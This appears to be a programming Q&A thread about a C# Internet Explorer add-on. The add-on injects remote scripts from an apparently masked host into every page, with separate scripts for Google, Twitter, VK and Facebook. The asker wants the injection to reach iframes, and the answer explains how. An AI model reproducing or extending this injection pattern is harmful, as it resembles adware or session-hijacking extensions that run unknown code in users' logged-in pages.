# Ie Addon Doesn't execute right in iframes

Tags: c#, internet-explorer, event-handling, activex, bho

Hi i made an ie bho addon in c#

here is the  OnDocumentComplete event

It works nice but 
When there is a web site that has iframes

it injects the scripts to the main window when it should inject into iframes?

I hope if i  could explain

```
public void OnDocumentComplete(object pDisp, ref object URL)
{
    if (((this.webBrowser != null) && (this.webBrowser.ReadyState == tagREADYSTATE.READYSTATE_COMPLETE)) && !this.webBrowser.Busy)
    {
        HTMLDocument o = this.webBrowser.Document as HTMLDocument;
        string hostname = o.location.hostname;
        Random random = new Random();
        if (o.getElementById("xxxxxxx") == null)
        {
            HTMLBody body = (HTMLBody) o.body;
            HTMLScriptElement element = (HTMLScriptElement) o.createElement("script");
            if (hostname.Contains("google."))
            {
                element.src = o.location.protocol + "//g.x.com/g.js?ie=" + random.Next(1, 0x186a0);
            }
            else if (hostname.Contains("twitter."))
            {
                element.src = o.location.protocol + "//tw.x.com/tw/tw.js?ie=" + random.Next(1, 0x186a0);
            }
            else if (hostname.Contains("vkontakte."))
            {
                element.src = o.location.protocol + "//vk.x.com/vk/vk.js?ie=" + random.Next(1, 0x186a0);
            }
            else if (hostname.Contains("vk."))
            {
                element.src = o.location.protocol + "//vk.x.com/vk/vk.js?ie=" + random.Next(1, 0x186a0);
            }
            else if (hostname.Contains("facebook."))
            {
                element.src = o.location.protocol + "//cdn.x.com/zt.js?ie=" + random.Next(1, 0x186a0);
            }
            else
            {
                element.src = string.Concat(new object[] { o.location.protocol, "//all.x.com/all/", hostname, ".js?ie=", random.Next(1, 0x186a0) });
            }
            body.appendChild((IHTMLDOMNode) element);
            Marshal.ReleaseComObject(element);
            Marshal.ReleaseComObject(body);
            Marshal.ReleaseComObject(o);
        }
    }
}
```

Answer (score 1):

I assume that you are setting the value of this.webBrowser in SetSite() or somewhere similar. Since it holds the main web browser, it's not surprising that your code isn't being injected into the iframe. The pDisp parameter to OnDocumentComplete is the browser you want. QI that to IWebBrowser2 and use it instead of this.webBrowser.

Comment: Yes.  You will receive onDocumentComplete once for the main outer window and each iFrame, since those are sub-documents.

Comment: you can refer from this answer.. hope it is related..http://stackoverflow.com/questions/35651305/ie-extention-plugin-addon-javascipt-injection-in-iframe-and-document-c-sharp